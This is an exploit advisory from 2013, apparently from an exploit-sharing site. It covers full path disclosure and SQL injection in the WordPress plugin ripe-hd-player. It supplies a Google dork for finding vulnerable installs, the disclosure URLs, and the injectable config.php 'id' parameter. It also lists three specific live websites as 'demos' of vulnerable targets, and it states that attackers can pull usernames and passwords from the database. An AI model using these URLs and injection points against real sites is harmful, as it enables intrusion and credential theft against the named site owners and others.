facebook facebook twitter rss

Wordpress plugins - ripe-hd-player FD/SQL Injection Vulnerability

Author: Zikou-16 , Published: 19-01-2013
-------------------------------------------------------------------
Wordpress plugins - ripe-hd-player FD/SQL Injection Vulnerability
-------------------------------------------------------------------

#####
# Author => Zikou-16
# E-mail => zikou16x@gmail.com
# Facebook => http://fb.me/Zikou.se
# Google Dork => inurl:"/wp-content/plugins/ripe-hd-player/"
# Tested on : Windows 7 , Backtrack 5r3
####

#=> Exploit Info :
------------------
# The attacker can access to the database & get username & password ....... & disclosure the Full Path
------------------

#=> Exploit :
------------------
1#=> Full Path Disclosure :

http://[target]/[path]/wp-content/plugins/ripe-hd-player/index.php
http://[target]/[path]/wp-content/plugins/ripe-hd-player/installer.php

-------
2#=> SQL Injection

http://[target]/[path]/wp-content/plugins/ripe-hd-player/config.php?id=2'[inj3ct h3re]

------------------------------

#=> Demos :

http://redesigninmind.com/wp-content/plugins/ripe-hd-player/config.php?id=2

http://www.ghasemyyeh.ir/wp-content/plugins/ripe-hd-player/config.php?id=2

http://www.amzcom.ir/wp-content/plugins/ripe-hd-player/config.php?id=4

------------------------------ <= Th3 End ^_^'

Like us on Facebook :